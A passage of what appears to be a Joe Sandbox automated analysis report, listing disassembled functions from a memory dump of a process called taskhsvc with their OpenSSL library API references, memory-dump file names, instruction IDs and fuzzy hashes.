                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: {
                                                            • API String ID: 1767461275-366298937
                                                            • Opcode ID: 076501f55eafee699c6b1f5ef24a94d0044cc8fa3c163bc9f6af50b15c6e7f3f
                                                            • Instruction ID: f17f2ae8f2468f4d9fc09e6b7e179525aa315f302bcc99cfd354e5b9d620a29f
                                                            • Opcode Fuzzy Hash: 076501f55eafee699c6b1f5ef24a94d0044cc8fa3c163bc9f6af50b15c6e7f3f
                                                            • Instruction Fuzzy Hash: 2B310BB12183028BE710DF29C58170BBBF1AF85318F218A1CE4B88B780D775D846CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC4560 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocR_put_error
                                                            • String ID: A$H$l
                                                            • API String ID: 2513334388-1199877664
                                                            • Opcode ID: 7d437f5551e765556ba5a337f7827105b9a08eb1c5db90503061afe83b4956b8
                                                            • Instruction ID: 571c5f2d8104cdc8d990ec0a1bab3ace7a0cb5d9b296117d45ad1a2ee6fc3fbd
                                                            • Opcode Fuzzy Hash: 7d437f5551e765556ba5a337f7827105b9a08eb1c5db90503061afe83b4956b8
                                                            • Instruction Fuzzy Hash: B231A2B11193019BEB40CF25C68478BBBF4BB85308F51894CE9A85F745C3BAE949CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC0D40 Relevance: 13.6, APIs: 9, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CEBEB50: CRYPTO_lock.LIBEAY32 ref: 6CEBEB87
                                                              • Part of subcall function 6CEBEB50: lh_doall_arg.LIBEAY32 ref: 6CEBEBA1
                                                              • Part of subcall function 6CEBEB50: CRYPTO_lock.LIBEAY32 ref: 6CEBEBC5
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CEC0D72
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$__stack_chk_faillh_doall_arg
                                                            • String ID:
                                                            • API String ID: 1839428306-0
                                                            • Opcode ID: 0562c13418699f18ca959608e6cca46a528b25fc444ee34e62ae54b05f923677
                                                            • Instruction ID: 25ac6dc7fa90fe42d3992259c7f56fcbdad65858b9af183f6f94dcf173096a75
                                                            • Opcode Fuzzy Hash: 0562c13418699f18ca959608e6cca46a528b25fc444ee34e62ae54b05f923677
                                                            • Instruction Fuzzy Hash: B8512FB56046418FCB00DF29C64165BBBF0BB89308F52895CE9A89B710E731E609CFC7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEA0CD0 Relevance: 13.6, APIs: 9, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EVP_MD_CTX_init.LIBEAY32 ref: 6CEA0D22
                                                            • EVP_MD_size.LIBEAY32 ref: 6CEA0D2A
                                                            • EVP_DigestInit_ex.LIBEAY32 ref: 6CEA0D7E
                                                              • Part of subcall function 6CEDCFD0: EVP_MD_CTX_clear_flags.LIBEAY32 ref: 6CEDCFF8
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CEA0D9E
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CEA0DBE
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CEA0DEF
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CEA0E1B
                                                            • EVP_MD_CTX_cleanup.LIBEAY32 ref: 6CEA0E47
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Digest$Final_exUpdate$D_sizeInit_exX_cleanupX_clear_flagsX_init
                                                            • String ID:
                                                            • API String ID: 526810657-0
                                                            • Opcode ID: b53cdba4e55866c09a247fa6cc1e93eda9851d57490a8f8f6bc40675244b5936
                                                            • Instruction ID: 583f29908e890103e34f3824bbbd1c1a8020ffc82a5fcb2b6130029f6b1a4a3f
                                                            • Opcode Fuzzy Hash: b53cdba4e55866c09a247fa6cc1e93eda9851d57490a8f8f6bc40675244b5936
                                                            • Instruction Fuzzy Hash: E65165742083818FD710DF68C58064BFBF1AF89348F25892DE9DA8B711D731E94ACB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3CC50 Relevance: 13.6, APIs: 9, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_num$sk_value$__stack_chk_failsk_delete
                                                            • String ID:
                                                            • API String ID: 2604466512-0
                                                            • Opcode ID: 718eb315a75e2ddff71a54803b64777cc6ba4b0d5b877da70df98e9f687c9d32
                                                            • Instruction ID: 543033fdb5ec8ad560e38df187436d7fa4b30272636a72c4d04da1763b3fc9cc
                                                            • Opcode Fuzzy Hash: 718eb315a75e2ddff71a54803b64777cc6ba4b0d5b877da70df98e9f687c9d32
                                                            • Instruction Fuzzy Hash: AB41F975509B309FC711EF29D58068BBBF0AF88354F166A1DE9A987710D730E94ACBC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF46510 Relevance: 13.6, APIs: 9, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$O_mallocsk_pop_free
                                                            • String ID:
                                                            • API String ID: 1972609574-0
                                                            • Opcode ID: ea799cec53553045f06f2ab1b89bae954b71a50f6bcda3c52cc051d6c26a677f
                                                            • Instruction ID: 4bf58d6f325591951df87025fa49f2b224b235ad232b9fcea6fb1fe40cfe8846
                                                            • Opcode Fuzzy Hash: ea799cec53553045f06f2ab1b89bae954b71a50f6bcda3c52cc051d6c26a677f
                                                            • Instruction Fuzzy Hash: FA4105B12057018BEB109F29C8A475BBBF5AF40358F228A6CE4958FB91D779D448CFD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEB04A0 Relevance: 13.6, APIs: 9, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEB04EA
                                                            • EC_KEY_insert_key_method_data.LIBEAY32 ref: 6CEB054A
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEB055F
                                                            • CRYPTO_free_ex_data.LIBEAY32 ref: 6CEB0576
                                                            • OPENSSL_cleanse.LIBEAY32 ref: 6CEB0586
                                                            • CRYPTO_free.LIBEAY32 ref: 6CEB058E
                                                            • EC_KEY_get_key_method_data.LIBEAY32 ref: 6CEB04D5
                                                              • Part of subcall function 6CE92200: CRYPTO_lock.LIBEAY32 ref: 6CE92241
                                                              • Part of subcall function 6CE92200: CRYPTO_lock.LIBEAY32 ref: 6CE92280
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishO_lock$L_cleanseO_freeO_free_ex_dataY_get_key_method_dataY_insert_key_method_data
                                                            • String ID:
                                                            • API String ID: 3521856835-0
                                                            • Opcode ID: 3633fffe26b80b1cb502b8cf95a529c3ef18a5e38c5c5df9ce0dad99c93dd48e
                                                            • Instruction ID: b7099785289a21984f624715f69ba7c486eb4a406718d9207642cfe5392fda77
                                                            • Opcode Fuzzy Hash: 3633fffe26b80b1cb502b8cf95a529c3ef18a5e38c5c5df9ce0dad99c93dd48e
                                                            • Instruction Fuzzy Hash: FF3150B15097499FD700DF65C78276BBBF4AF84308F21892CE498ABB00D774E9458BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF08FD0 Relevance: 13.6, APIs: 9, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
